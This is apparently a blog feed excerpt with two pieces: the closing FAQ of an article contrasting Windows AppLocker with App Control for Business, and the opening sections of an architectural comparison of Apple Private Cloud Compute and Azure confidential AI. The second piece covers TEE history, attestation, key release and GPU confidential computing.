The AppLocker MMC wizard does not create default rules automatically. If you enable enforcement on a collection with zero rules, the collection's *default behaviour* is to **deny everything that matches the collection**. An enforcing Executable collection with no rules blocks every `.exe` on the device, including the ones Windows needs to boot useful applications. The wizard surface has an *Automatically generate rules* button precisely to avoid this footgun; the AaronLocker authoring path bakes the default rules in from the start. If you have ever seen a Windows session that suddenly cannot launch anything after a GPO refresh, this is the most common cause.

The decision tree is operational. The remaining job is to inoculate against the misconceptions the field has accumulated over twenty-five years. That is the FAQ.

15. FAQ -- Misconceptions and Corrections

The application-control literature has accumulated eight common misconceptions over twenty-five years. Each one is corrected below with the primary source that settles the question.

Not in the threat-modelling sense. Microsoft Learn states directly that AppLocker *"helps to prevent end-users from running unapproved software on their computers, but doesn't meet the servicing criteria for being a security feature"* [@ms-appcontrol-applocker-overview]. AppLocker is operational hygiene against non-admin users running unapproved binaries. An attacker who has reached administrator or `SYSTEM` can stop the `AppIDSvc` service and end enforcement [@ms-applocker-architecture]. If your threat model includes an admin-equivalent attacker, AppLocker is not the right control; App Control for Business with a signed policy and HVCI on is. No. App Control for Business is the current name for what was called Windows Defender Application Control from 2017 to 2024, which was called Configurable Code Integrity under the Device Guard umbrella from 2015 to 2017. Same kernel CI code path, three brand eras [@ms-appcontrol-applocker-overview] [@ms-blog-introducing-wdac-2017] [@github-wdac-toolkit-issue-411]. The rename in 2024 with Windows 11 24H2 and Server 2025 is brand management; the cmdlets and the policy XML schema are unchanged. No. You sign the policy with the **deploying organisation's** code-signing certificate -- typically an internal PKI leaf, with the private key on a hardware token or in a sealed vault [@ms-appcontrol-applocker-overview]. The application publisher's certificate is what the policy *evaluates against* at image-load time (signer rules in the policy reference publisher subjects). The two are entirely different roles. A common misreading is to assume that *"signed policy"* means *"policy that allows signed apps"* -- it does not. *Signed policy* means the `.cip` file itself carries a signature that prevents a `SYSTEM` attacker from removing or replacing it. No. ISG is a reputation classifier, not a list. Microsoft Learn states verbatim [@ms-appcontrol-isg]: *"The ISG isn't a 'list' of apps. Rather, it uses the same vast security intelligence and machine learning analytics that power Microsoft Defender SmartScreen and Microsoft Defender Antivirus to help classify applications as having 'known good,' 'known bad,' or 'unknown' reputation."* When an App Control policy is configured with ISG enabled, ISG's *known good* verdict acts as an additive allow signal alongside the policy's explicit signer / hash / path / Managed Installer rules. **No such feature exists.** A search of Microsoft Learn produces zero results for *ITL* or *Intelligent Trusted List*; URLs cited by AI summaries return 404; and the definitions offered by AI summaries contradict each other. The closest real Microsoft features are the Intelligent Security Graph [@ms-appcontrol-isg], the Microsoft Recommended Block Rules [@ms-appcontrol-bypass], and Smart App Control [@ms-smart-app-control]. If you see *ITL* in a security blog or AI-generated summary, treat it as a fabrication and ignore it. No. **AaronLocker** is Aaron Margosis's *deployment tool* [@github-aaronlocker]. It is a PowerShell-based generator that authors thorough audit and enforce policies for AppLocker and App Control. The canonical AppLocker *bypass* catalogue is Oddvar Moe's `UltimateAppLockerByPassList` [@github-ultimateapplockerbypass]. The canonical App Control bypass catalogue is Jimmy Bayne's `bohops/UltimateWDACBypassList` [@github-ultimatewdacbypass]. Microsoft's own bypass list is the *Applications that can bypass App Control* page [@ms-appcontrol-bypass]. Four different artefacts, four different roles. The enforcement engine is approximately the same (both run inside `ci.dll`), but SAC is a categorically different product: unmanaged, all-or-nothing, ISG-gated, and capable of silently auto-disabling [@ms-smart-app-control]. SAC has no per-app policy authoring surface, no GPO, no Intune integration. Enterprise-managed devices keep SAC off [@ms-support-sac-faq]. And contrary to older blog posts, SAC can be re-enabled without a clean Windows install on current Windows versions: *"Recent Windows updates allow Smart App Control to be re-enabled without requiring a clean installation"* [@ms-support-sac-faq]. The vocabulary is *evaluation mode*, not *audit mode*. No -- not in any sense Microsoft would recognise. As of February 2, 2026, AppLocker is not on the *Deprecated features in the Windows client* page [@ms-deprecated-features]. Microsoft Learn does say AppLocker *"isn't getting new feature improvements"* and that it *"doesn't meet the servicing criteria for being a security feature"* [@ms-appcontrol-applocker-overview], but it also says AppLocker *"continues to receive security fixes"* -- and the October 2024 KB5044288 cumulative update confirms that claim with a concrete AppLocker servicing fix [@ms-kb-5044288]. The defensible characterisation is *feature complete, not actively developed, continues to receive security fixes* -- not *deprecated*.

The thesis was the article's first sentence: two locks on the same door, two threat models, not redundancy. AppLocker is operational hygiene, the user-mode evaluator Microsoft itself declines to call a security feature. App Control for Business -- with a signed policy, HVCI on, and the Recommended Block Rules merged in -- is the MSRC security boundary. Both ship in Windows 11 24H2 and Server 2025 because neither is a strict superset of the other, and the practitioner gets to choose, per deployment, which lock the door needs. For deeper treatment of the cryptographic plumbing, see the companion Authenticode article; for the HVCI / VTL story, see the companion WDAC + HVCI article; for the BYOVD residual in section 13, see the companion Driver Signing article. The line between security feature and operational hygiene control is sharp in Microsoft's own words -- and the two products defending that line will both keep shipping until the line itself moves.

Verify Me, Don't Trust Me: Apple PCC, Azure Confidential AI, and the Architecture of the Modern AI Cloud

noreply@paragmali.com (Parag Mali) — Mon, 01 Jun 2026 00:00:00 GMT

Apple and Microsoft now ship the same user-facing promise -- "the cloud cannot see your AI prompt" -- through completely different machinery. Apple's **Private Cloud Compute** (announced June 10, 2024 [@apple-pcc-blog]; source release October 24, 2024 [@apple-pcc-research]) runs custom Apple-Silicon servers with a per-node Secure Enclave Processor and publishes every production image hash to a public, append-only **Transparency Log** that the user's device cryptographically refuses to bypass. Microsoft's Azure confidential AI substrate (`NCCads_H100_v5`, GA September 24, 2024 [@ms-h100-ga]) composes AMD SEV-SNP confidential VMs with NVIDIA H100 GPUs in CC-On mode, verifies the composed attestation through Microsoft Azure Attestation, and gates customer-managed keys through Secure Key Release from Azure Key Vault. On five of six architectural axes the two designs differ in *degree*. On the sixth -- verifiable transparency of the production fleet -- they differ in *kind*.

1. Same Promise, Opposite Architectures

On June 10, 2024, Apple announced Private Cloud Compute and promised that "personal user data sent to PCC isn't accessible to anyone other than the user -- not even to Apple" [@apple-pcc-blog]. On September 24, 2024, Microsoft brought its first confidential GPU SKU to general availability. NVIDIA's companion blog called Azure "the first cloud provider to offer confidential computing with NVIDIA H100 GPUs" [@nvidia-h100-ga]. Microsoft's coordinated Trustworthy AI post framed the same architectural commitment: Microsoft itself cannot view or tamper with the data or the model inference process [@ms-h100-ga] [@ms-trustworthy-ai]. Two vendors. The same user-facing contract. Five months apart.

Open the lid on either one and the machinery is unrecognisable.

Apple PCC runs on custom Apple-Silicon servers, each with a Secure Enclave Processor wired into a vendor-controlled certificate chain. Every production node image hash is published to an append-only public log that the user's device cryptographically refuses to bypass [@apple-pcc-blog] [@apple-pcc-release-transparency].

Azure's confidential-AI substrate runs on the Standard_NCC40ads_H100_v5 SKU: 40 non-multithreaded 4th-Gen AMD EPYC Genoa vCPUs, 320 GiB of RAM, one NVIDIA H100 NVL GPU with 94 GB of high-bandwidth memory, with the Trusted Execution Environment "spanning confidential VM on the CPU and attached GPU" [@ms-sku-nccads]. Trust is rooted in AMD's per-chip signing key, Intel's TDX module on the alternative SKU family, NVIDIA's on-die hardware root of trust on the GPU, and a Microsoft-operated verifier service called Microsoft Azure Attestation [@ms-maa-overview]. None of those signers are Apple, and Apple's signer is none of them.

That is not a difference of brand preference. It is a difference about who you are trusting and how you can check.

This article is a side-by-side architectural treatment of the two designs. It will compare them on six axes you will be able to recite at the end:

Silicon control -- who controls the chip, the firmware, the OS, and the inference runtime.
Hardware root of trust -- which signing keys anchor the attestation chain.
Attestation surface -- what cryptographic artefact the relying party actually consumes.
Key release and state model -- whether the customer holds keys, and how those keys are released to the workload.
GPU TEE -- how confidential compute extends from the CPU into the GPU.
Network anonymization -- whether the operator can correlate requests with their originating client.

By the end you should be able to read a Microsoft Azure Attestation JSON Web Token and an Apple PCC attestation envelope at the same level of fluency, and explain to a non-specialist what each cryptographic artefact actually proves. You should be able to name the threat each architecture defends against, and the threats neither closes by construction.

When the user-facing promise is the same, the architectural divergence is the entire story. To understand what that divergence means, we first have to see where each architecture came from. The two designs did not converge on the same problem by coincidence. They descended from two different ancestor problems that took until 2024 to meet.

2. Confidential Computing's Two Parents

September 14, 2017. Mark Russinovich, Azure CTO, publishes "Introducing Azure confidential computing." Microsoft, he writes, is "the first cloud to offer new data security capabilities with a collection of features and services called Azure confidential computing," and the point of the announcement is "encryption of data while in use" [@ms-russinovich-2017]. Russinovich names "data in use" as the third protection state, the missing companion to "at rest" and "in transit." Five years later the Confidential Computing Consortium publishes "A Technical Analysis of Confidential Computing" v1.3, the vendor-neutral document both Apple and Microsoft now anchor on, which defines the field formally and gives the lower bounds explicitly [@ccc-technical-analysis] [@ccc-about].

Russinovich's framing did not appear from nowhere. It was the cloud-operator-side voice of a conversation that had two parents in the underlying hardware.

Parent one: the hardware TEE lineage

A Trusted Execution Environment is a hardware-isolated execution context inside a system whose own host operating system or hypervisor is not trusted to look in. The lineage starts in the early 2000s with ARM TrustZone's split-world NS-bit, then Intel TXT (Trusted Execution Technology) for measured launch on the CPU side -- originally announced as LaGrande Technology at IDF 2003 and rebranded as TXT around 2007 with the vPro / Q35-Q45 chipset rollout. Apple shipped its first Secure Enclave Processor -- a separate Apple-designed processor core on the same SoC as the main application processor, with its own boot ROM, AES engine, and protected memory -- on the iPhone 5s in September 2013 [@apple-sep-guide].

A hardware-isolated execution context inside a larger system in which code can run with cryptographic guarantees of confidentiality and integrity even when the system's own operating system, hypervisor, or peripheral firmware is compromised or controlled by an adversary. TEEs include process-scope enclaves (Intel SGX), VM-scope confidential VMs (AMD SEV-SNP, Intel TDX), and on-die separate-processor designs (Apple Secure Enclave Processor, Microsoft Pluton).

Intel SGX (Software Guard Extensions) arrived as the first widely-available general-purpose TEE on commodity x86 silicon, with the architectural model first described in the McKeen et al. HASP 2013 paper [@mckeen-sgx-hasp] and given general availability on Skylake-era Core CPUs in late 2015. Costan and Devadas's "Intel SGX Explained" (IACR ePrint 2016/086) became the canonical academic systematization [@costan-sgx]. SGX let an application author carve out an enclave -- a slice of address space encrypted in DRAM by a per-CPU memory-encryption engine and measured at creation time -- and have a remote party verify, through an Intel-signed attestation report, that a specific code measurement was running before any secret was released to it.

Per the Confidential Computing Consortium: protection of data in use through computation in a hardware-based, attested Trusted Execution Environment. The CCC explicitly extends the protection state-pair (at rest, in transit) with a third state (in use) and treats hardware TEEs as the substrate that makes the third state cryptographically enforceable. The CCC v1.3 analysis is the vendor-neutral definitional document both Apple and Microsoft cite [@ccc-technical-analysis] [@ms-cc-overview].

Parent two: the cloud-operator-as-adversary lineage

The other parent was the cloud. Once enterprise workloads moved into public clouds, the cloud operator itself became part of the threat model. AMD published the first SEV API specification ("Secure Encrypted Virtualization") in April 2016, with silicon support shipping in the EPYC 7001 "Naples" family in June 2017 -- attaching a per-VM memory-encryption key to AMD EPYC processors. SEV-ES followed in February 2017, adding encrypted register state on world switches. SEV-SNP (Secure Nested Paging), described in an AMD whitepaper in January 2020 [@amd-sev-snp-wp], added integrity protection through the Reverse Map Table. Intel's parallel response was TDX (Trust Domain Extensions), specified in September 2020.

Both AMD and Intel framed the contribution the same way: protect the guest from a hypervisor that may itself be the adversary. That framing was exactly what Russinovich's 2017 post had been pointing at, three years earlier, on the cloud side [@ms-russinovich-2017].

Convergence

The two parents started speaking a common vocabulary in the early 2020s. The Confidential Computing Consortium was founded in August 2019 as a Linux Foundation project community, with members across CPU vendors (AMD, Intel, NVIDIA, ARM), cloud providers (Microsoft, Google, Oracle), and OS / runtime vendors (Red Hat, Canonical, IBM) [@ccc-about].

In January 2023 the IETF Remote ATtestation procedureS (RATS) Working Group published RFC 9334, "Remote ATtestation procedureS (RATS) Architecture," giving the field a single vocabulary for the four roles in any attestation flow: the Attester (the workload making the claim), the Verifier (the party that checks the cryptographic evidence), the Relying Party (the party that makes a decision based on the verified result), and the Endorser (the party that vouches for the Attester's identity, typically the silicon vendor) [@ietf-rfc9334].

Both Apple PCC and Microsoft Azure Attestation map cleanly onto RFC 9334's vocabulary. They use the same words for the same roles. The architectures that fill those roles are different.

timeline title TEE and confidential-computing milestones (2003-2024) section Hardware TEE lineage 2003 : ARM TrustZone (mobile split-world) 2007 : Intel TXT / LaGrande (measured launch) 2013 : Apple Secure Enclave on iPhone 5s 2015 : Intel SGX general availability (Skylake) 2016 : Costan and Devadas SGX Explained section Cloud operator as adversary 2016 : AMD SEV (memory encryption) 2017 : AMD SEV-ES (encrypted register state) 2017 : Azure CC introduced (Russinovich) 2020 : AMD SEV-SNP whitepaper (integrity via RMP) 2020 : Intel TDX specification section Vocabulary and standards 2019 : Confidential Computing Consortium founded 2022 : CCC Technical Analysis v1.3 2023 : IETF RFC 9334 RATS Architecture 2024 : Apple PCC and Azure H100 CC-On GA

Apple's lineage is a third tributary the other two largely overlook. The iPhone Data Protection model, anchored in the SEP since 2013, and iCloud Private Relay's two-hop architecture from 2021 onward both fed into PCC. PCC is the only major-vendor confidential-AI substrate descended from a device-side TEE origin rather than a cloud-side one [@apple-sep-guide] [@apple-pcc-blog].

Both parents converged on the same vocabulary by 2023. But the first attempts at putting that vocabulary into production hit walls neither parent had predicted -- starting with the 128 MB enclave that broke deep learning before it began.

3. Process Enclaves and the Operator-Honesty Assumption

August 2018, USENIX Security. Jo Van Bulck and nine co-authors publish "Foreshadow: Extracting the Keys to the Intel SGX Kingdom with Transient Out-of-Order Execution" [@foreshadow]. The attack reads L1-cached enclave memory transiently and -- this is the load-bearing detail -- recovers the SGX EPID attestation-signing key for the targeted CPU generation. Once an attestation key leaks, every attestation that platform produces is forgeable to the attacker until microcode is updated and the EPID group is revoked. The whole "the enclave really is what it says it is" property collapses for that CPU generation overnight.

To understand what Foreshadow was attacking, it helps to walk SGX's enclave lifecycle. A privileged-mode application invokes ECREATE to reserve an enclave address range; pages are added with EADD, each call measuring the page contents into a SHA-256 chain that becomes the enclave's MRENCLAVE measurement; EINIT finalises the chain and locks the enclave; EENTER is then the only legal entry point [@mckeen-sgx-hasp] [@costan-sgx]. When a remote party asks the enclave to prove its identity, the Quoting Enclave -- a small Intel-signed enclave on every SGX-enabled CPU -- signs a REPORT structure with the EPID key. The remote party verifies the EPID signature against the Intel Attestation Service and learns which code measurement the enclave is running.

sequenceDiagram participant App as Untrusted app participant CPU as SGX hardware participant QE as Quoting Enclave participant IAS as Intel Attestation Service participant RP as Relying Party App->>CPU: ECREATE (reserve enclave) App->>CPU: EADD pages (measured into MRENCLAVE) App->>CPU: EINIT (finalise measurement) App->>CPU: EENTER (transfer control) CPU->>QE: produce local REPORT QE->>IAS: sign REPORT with EPID key IAS->>RP: verify quote, return result RP->>App: release secret if measurement matches A dedicated secure subsystem integrated into Apple Silicon, isolated from the main application processor with its own boot ROM, AES Engine, and protected memory. The SEP runs an L4-derived microkernel and was first shipped on the iPhone 5s in 2013. It is not a TPM, not the NFC Secure Element used for Apple Pay, and not architecturally related to Intel SGX. It is the per-node hardware root of trust on every Apple Private Cloud Compute server [@apple-sep-guide] [@apple-pcc-blog].

SGX scaled to a billion CPUs in three or four years, but it never scaled to deep learning. Three killer constraints stopped it.

Constraint one: the Enclave Page Cache ceiling. On Skylake-class client and Xeon E-2100 / E-2200 (Coffee Lake-based) server SKUs the Enclave Page Cache (EPC) was capped at 128 MB total per socket, of which only ~96 MB was usable for application data after Intel's bookkeeping overhead. An order of magnitude too small for any modern deep-learning workload, where a single set of weights for even a small model could easily exceed the EPC by a factor of 100 or more. (Skylake-SP and Cascade Lake-SP server Xeons did not ship SGX at all; SGX at server scale only arrived with Ice Lake-SP in 2021, by which point the cloud-AI story had moved past process-scope enclaves.)

Constraint two: the programming model. SGX required the application author to split the codebase into a trusted (in-enclave) and untrusted (outside-enclave) half, with explicit ECALL and OCALL transitions and a fixed serialised data interface across the trust boundary. Production codebases written before SGX existed simply refused to be partitioned that way. The handful of teams that tried -- mainly Intel internal proof-of-concepts -- produced systems that worked but did not generalise.

Constraint three: the side-channel cascade. Foreshadow / L1TF in August 2018 [@foreshadow]; SgxPectre at IEEE EuroS&P 2019, demonstrating Spectre-v1-style transient-execution attacks inside SGX enclaves [@sgxpectre]; Plundervolt in IEEE S&P 2020, a software-based fault-injection attack via Intel's privileged voltage-control interface, assigned CVE-2019-11157 [@plundervolt]. Each closed a different residual surface that Intel's threat model had not named. The principled extension -- that any TEE on shared silicon inherits a microarchitectural side-channel surface that the architectural threat model does not cover -- became the field's unspoken second axiom.

SGX's attestation chain itself went through a generational turnover. The original EPID (Enhanced Privacy ID) scheme tied attestation verification to the Intel Attestation Service as a centralised relying party. By 2018 Intel had begun the transition to DCAP (Data Center Attestation Primitives), letting cloud operators host their own attestation infrastructure. The transition was exactly because EPID-pinned-to-IAS was incompatible with how cloud providers wanted to verify attestations at fleet scale.

AMD's first-generation SEV and SEV-ES belong to the same era. They encrypted guest memory and (in SEV-ES) the saved register state on world switches, but they did not yet have the integrity check that would make a malicious hypervisor architecturally unable to mount remap-style attacks. That defence had to wait for SEV-SNP and a different failure that demonstrated, on the other side of the trust boundary, exactly the same lesson Foreshadow had taught on the Intel side.

Process-scope enclaves were the wrong granularity. The fix had to come from somewhere else. What if you encrypted whole virtual machines instead?

4. Three Architectural Waves That Made Cloud Confidential AI Feasible

WOOT 2018. Mathias Morbitzer, Manuel Huber, Julian Horsch, and Sascha Wessel publish "SEVered: Subverting AMD's Virtual Machine Encryption" [@severed]. A malicious hypervisor remaps a guest's network-facing service to point at other guest physical pages; the service unwittingly serves the contents of those pages -- still inside the guest, still nominally encrypted at the memory controller -- as plaintext over the network. The encryption did not break. The attack did not need it to.

This is the architectural insight every Generation-3-and-later confidential VM design is built on.

Key idea: Confidentiality without integrity is not isolation. A confidential VM that encrypts memory but does not bind the encryption to a specific physical page can be tricked into encrypting and then leaking other guests' contents on the operator's behalf. Every TEE design from 2020 onward is haunted by the SEVered failure.

Wave 1 (~2020-2022): VM-level TEEs with hardware-enforced page ownership

AMD's response was SEV-SNP and the Reverse Map Table (RMP): one entry per 4 KB physical page in the system, tracking ownership, validation state, and the permitted size class for that page. Guest pages transition from INVALID to VALIDATED only via a guest-initiated PVALIDATE instruction; subsequent hypervisor remap attempts that would violate the RMP fault out at the hardware level. Intel TDX took a parallel architectural path: a new privilege ring below the hypervisor called SEAM mode, running the Intel-signed TDX Module, with per-VM trust-domain encryption keys managed through MK-TME (Multi-Key Total Memory Encryption).

A hardware-managed table maintained by AMD SEV-SNP processors with one entry per 4 KB physical page in the system. Each entry records the page's owner (which guest, if any), its validation state (`VALIDATED` or not), and the permitted size class. The hypervisor cannot remap a guest-owned page into a different guest without triggering a fault. The RMP is AMD's architectural response to SEVered: it makes the SEVered class of attacks impossible by construction.

Azure brought the SEV-SNP substrate to general availability in 2022 with the DCasv5 and ECasv5 confidential VM families (the a denotes AMD silicon, the s denotes premium storage) [@ms-cc-overview]. Intel TDX entered public preview on Azure in December 2023. Full general availability of the next-generation Intel TDX confidential VMs on 5th-Gen Intel Xeon Scalable Emerald Rapids -- the DCesv6, DCedsv6, ECesv6, and ECedsv6 families -- followed on February 26, 2026 [@ms-tdx-v6-ga] [@ms-dcesv6].

The earlier SEV and SEV-ES generations were not free of side channels either. Li, Zhang, Wang, Li, and Cheng's "CipherLeaks" (USENIX Security 2021) showed a deterministic-ciphertext side channel against SEV-ES: identical plaintext at the same physical address produced identical ciphertext, letting a hypervisor observe constant-time cryptographic implementations and recover keys without ever breaking the encryption [@cipherleaks]. SEV-SNP's tweakable ciphertext mode addressed this, but the architectural lesson -- that "the encryption is intact" is not the same as "the operator learns nothing" -- repeats.

Wave 2 (~2022-2024): Attestation and key release as managed services

The second wave was less spectacular but more consequential for procurement. Microsoft Azure Attestation (MAA) is a managed verifier that consumes SEV-SNP attestation reports, TDX quotes, SGX quotes, VBS enclave reports, vTPM event logs, and Trusted Launch evidence and issues a JSON Web Token (JWT) with documented x-ms-isolation-tee, x-ms-compliance-status, x-ms-sevsnpvm-*, and x-ms-runtime claims [@ms-maa-overview]. Per the MAA overview verbatim: "Azure Attestation supports both platform- and guest-attestation of AMD SEV-SNP based Confidential VMs (CVMs)" [@ms-maa-overview]. The JWT can then drive Secure Key Release from Azure Key Vault Premium or Azure Managed HSM: the encrypted customer key carries a release policy against MAA-issued claims, and the HSM unwraps the key only when the policy is satisfied [@ms-cc-overview].

A managed Microsoft cloud service that acts as the Verifier (in the IETF RFC 9334 sense) for confidential workloads on Azure. MAA consumes hardware-vendor attestation evidence (SGX quotes, SEV-SNP attestation reports, Intel TDX quotes, vTPM event logs) and produces a signed JSON Web Token whose `x-ms-*` claims describe the attested TEE state. The JWT is the artefact that downstream relying parties -- including Azure Key Vault's Secure Key Release flow -- consume to decide whether to release a secret to the workload [@ms-maa-overview]. An Azure Key Vault Premium and Azure Managed HSM capability that gates release of a wrapped key on a successful attestation. The customer attaches a *release policy* to the key at creation time; the policy is evaluated against the claims of an MAA-issued JWT presented at unwrap time. The key is released to the workload only when the MAA token's claims match the policy. SKR makes customer-managed key material a first-class architectural primitive for Azure confidential workloads [@ms-cc-overview] [@ms-maa-overview].

This is the implementation of what RFC 9334 calls the Passport topological pattern: the Attester collects evidence once, hands it to the Verifier, gets back an Attestation Result (the MAA JWT), and then carries that Result to any Relying Party (the HSM, an external policy engine, an audit log) for the rest of the session [@ietf-rfc9334].

The MAA-as-managed-service shift removed a substantial per-customer engineering burden: customers no longer have to write their own attestation-report parsers, certificate-chain validators, or revocation-list checkers. This is the practical reason confidential VMs moved from research artefact to procurement category in 2022-2024. The trade-off it carries is structural: MAA itself becomes a trust anchor. If MAA's signing infrastructure or its policy-evaluation code is compromised, every relying party that consumes a MAA JWT is exposed in the same breath. The verifier is now a control point.

Wave 3 (June-October 2024): GPU TEEs, vendor-controlled fleets, and the public arrival of confidential AI

The third wave landed in five months in 2024 and changed what "confidential AI" could mean in production.

The NVIDIA Hopper H100 confidential-computing whitepaper (WP-11459-001) had landed in July 2023 [@nvidia-whitepaper], and the NVIDIA Developer Blog technical post that accompanied it described the architecture in detail: an on-die hardware root of trust, secure measured boot of the GPU firmware, an SPDM (Security Protocol and Data Model) session connecting the CPU TEE driver to the GPU with mutual authentication, and encrypted bounce-buffer data movement between CPU encrypted memory and GPU encrypted HBM [@nvidia-dev-blog]. The blog states the architectural fact verbatim: "The NVIDIA H100 Tensor Core GPU is the first ever GPU to introduce support for confidential computing" [@nvidia-dev-blog].

Apple announced Private Cloud Compute on June 10, 2024 at WWDC, with the canonical primary titled "Private Cloud Compute: A new frontier for AI privacy in the cloud" [@apple-pcc-blog]. Microsoft Build 2024 (May 21, 2024) announced confidential inferencing not for GPT-4 but for the Azure OpenAI Whisper speech-to-text model [@ms-workshop-whisper].

Microsoft's NCCads_H100_v5 confidential GPU VM family -- 4th-Gen AMD EPYC Genoa CPU plus one NVIDIA H100 NVL GPU per VM, with the TEE spanning both [@ms-sku-nccads] -- reached general availability on September 24, 2024 [@ms-h100-ga]. The companion Microsoft Trustworthy AI post made the same architectural commitment: customer data and models remain inaccessible to Microsoft itself [@ms-trustworthy-ai] [@ms-h100-ga]. NVIDIA's parallel announcement underscored the same fact verbatim: "Azure is the first cloud provider to offer confidential computing with NVIDIA H100 GPUs" [@nvidia-h100-ga].

Then on October 24, 2024 Apple published the supporting source code at github.com/apple/security-pcc, shipped the Virtual Research Environment with macOS Sequoia 15.1 Developer Preview, and extended the Apple Security Bounty to PCC with rewards up to $1,000,000 [@apple-pcc-research] [@apple-pcc-github]. By end of October the substrate for cloud-scale confidential AI existed in two parallel forms. But "shipping" does not mean "settling on one architecture." Two distinct breakthroughs landed within five months of each other and took the substrate in opposite directions.

flowchart LR A[Attacker
controls hypervisor] -->|Remaps guest GPA tables| B[SEV guest
network service] B -->|Reads memory under remapped pages| C[Other guest memory
still under encryption] B -->|Serves bytes over network| D[Attacker collects
plaintext] style A fill:#fee,stroke:#c33,color:#7f1d1d style D fill:#fee,stroke:#c33,color:#7f1d1d

Note: SEVered did not recover an encryption key. It did not need to. By remapping page tables the malicious hypervisor convinced the guest to serve its own encrypted contents as plaintext. The fix -- per-page ownership tracking in hardware via the AMD Reverse Map Table and analogous mechanisms in Intel TDX -- defines what a Generation-3 confidential VM is. Earlier generations encrypted memory but did not authenticate ownership. They were not isolation; they were just encryption.

5. Two Distinct 2024 Designs

June 10, 2024, WWDC. Apple Security Engineering and Architecture -- the institutional author block of the post, along with User Privacy, Core OS, Services Engineering, and Machine Learning and AI -- publishes "Private Cloud Compute: A new frontier for AI privacy in the cloud" [@apple-pcc-blog]. The post enumerates five core requirements verbatim: stateless computation on personal user data, enforceable guarantees, no privileged runtime access, non-targetability, and verifiable transparency [@apple-pcc-blog]. The fifth requirement is the one nothing in the field had ever shipped at this scale.

(a) Apple's Verifiable Transparency model

Every production PCC node software image hash is published to an append-only Transparency Log. Apple's canonical terminology is "Transparency Log" and "Release Transparency" -- both are reflected in the URL path of the Apple documentation page that defines the model [@apple-pcc-release-transparency] [@apple-pcc-doc]. The user's device cryptographically refuses to forward a request to a node whose image hash is not in the log; in Apple's words, "your device won't issue requests to PCC unless the OS image running in PCC is logged for inspection" [@apple-pcc-blog].

An append-only public log of every production Private Cloud Compute node software image hash. The log is structured along the lines of RFC 6962 Certificate Transparency -- a Merkle tree of measurement entries that can be audited end-to-end without trusting any single party. Apple's canonical primary uses the terms "Transparency Log" and "Release Transparency"; "Verifiable Image Catalog" is not Apple terminology. The user's device refuses to forward a request to a PCC node whose image hash is not in the log, making the log a precondition for any data flow [@apple-pcc-blog] [@apple-pcc-release-transparency].

On October 24, 2024 Apple released the supporting source code at github.com/apple/security-pcc, shipped the Virtual Research Environment (VRE) with macOS Sequoia 15.1 Developer Preview to let researchers run the PCC software stack (including a virtual Secure Enclave Processor) inside a Mac, and extended the Apple Security Bounty to PCC with rewards up to $1,000,000 [@apple-pcc-research] [@apple-pcc-github]. The README on the source release states the scope plainly: "The publication of this code is intended for security research and verification purposes only" [@apple-pcc-github]. The components in the release include CloudAttestation (the attestation envelope library), Thimble (the on-device PCC client), splunkloggingd (the audited logging path), and srd_tools (security-research tooling).

Personal user data sent to PCC isn't accessible to anyone other than the user -- not even to Apple. -- Apple Security Engineering and Architecture, June 10, 2024 [@apple-pcc-blog]

The network ingress path to PCC reinforces the non-targetability requirement. Client requests are routed through an Oblivious HTTP relay, operated by an independent third party rather than by Apple, that strips the client IP address before forwarding the request to the PCC cluster. OHTTP is standardised in IETF RFC 9458 by Martin Thomson and Christopher A. Wood, January 2024, with the explicit goal of letting "a client make multiple requests to an origin server without that server being able to link those requests to the client or to identify the requests as having come from the same client" [@ietf-rfc9458].

Apple's Target Diffusion design layers an RSA Blind Signatures protocol -- RFC 9474 [@ietf-rfc9474] -- on top of the OHTTP path to issue single-use credentials, so even the relay cannot link two requests as having come from the same client.

The OHTTP relay is third-party operated -- not Apple-operated. This is the architectural detail that makes non-targetability work. If Apple operated both the relay and the PCC cluster, Apple would observe the client IP at the relay and the request payload at the cluster and could correlate them. By splitting the two roles across two organizations whose business interests are not aligned, Apple can argue (and the architecture can enforce) that no single organization holds both halves of the correlation.

sequenceDiagram participant Dev as User device participant Log as Transparency Log participant Relay as OHTTP relay (third party) participant Node as PCC node (SEP-rooted) Dev->>Log: fetch current log root Log-->>Dev: signed root, inclusion proofs Dev->>Dev: verify target image hash is in log Dev->>Relay: encrypted request (no client IP at origin) Relay->>Node: forwarded request (relay IP only) Node->>Node: enforce stateless processing Node-->>Relay: response, SEP-signed attestation envelope Relay-->>Dev: response delivered Dev->>Dev: verify SEP attestation matches logged image

(b) Microsoft and NVIDIA's cross-vendor CPU+GPU TEE composition

The other 2024 breakthrough was a composition. The Standard_NCC40ads_H100_v5 SKU is a confidential VM whose Trusted Execution Environment "spans confidential VM on the CPU and attached GPU, enabling secure offload of data, models, and computation to the GPU" [@ms-sku-nccads]. The substrate is an AMD SEV-SNP confidential VM on a 4th-Gen AMD EPYC Genoa CPU. The accelerator is an NVIDIA H100 NVL GPU with 94 GB of high-bandwidth memory, operating in CC-On mode [@ms-sku-nccads] [@nvidia-dev-blog].

The H100 in CC-On mode performs secure measured boot of its firmware against an on-die hardware root of trust, then establishes mutually-authenticated SPDM (Security Protocol and Data Model) sessions with the CPU TEE driver, and routes all data movement between CPU encrypted memory and GPU encrypted HBM through an encrypted bounce buffer. The NVIDIA Developer Blog states it verbatim: "a chain of trust is established through ... a security protocols and data models (SPDM) session to securely connect to the driver in a CPU TEE" [@nvidia-dev-blog]. The GPU's attestation report is signed against NVIDIA's on-die root of trust and consumable through NVIDIA's NRAS (NVIDIA Remote Attestation Service) and the open-source nvtrust SDK [@nvidia-nvtrust].

An IETF protocol for forwarding HTTP requests through an intermediary in a way that prevents either the intermediary or the target from linking requests to a single client. Per RFC 9458 verbatim: "Oblivious HTTP allows a client to make multiple requests to an origin server without that server being able to link those requests to the client or to identify the requests as having come from the same client, while placing only limited trust in the nodes used to forward the messages" [@ietf-rfc9458]. Apple Private Cloud Compute uses an OHTTP relay operated by an independent third party to enforce non-targetability.

The CPU-to-GPU interconnect throughput in H100 CC-On is bounded by CPU encryption performance, not by raw PCIe or NVLink bandwidth. The NVIDIA Developer Blog measures it verbatim: "It is limited by CPU encryption performance, which we currently measure at roughly 4 GBytes/sec" [@nvidia-dev-blog]. Practitioners sizing throughput around H100 NVL's 94 GB HBM3 capacity should reason about the ~4 GB/s encryption ceiling, not the headline NVLink rate. The ceiling is what makes large-model long-sequence workloads amortise the overhead well, and what makes small-model short-prompt workloads pay a higher relative cost.

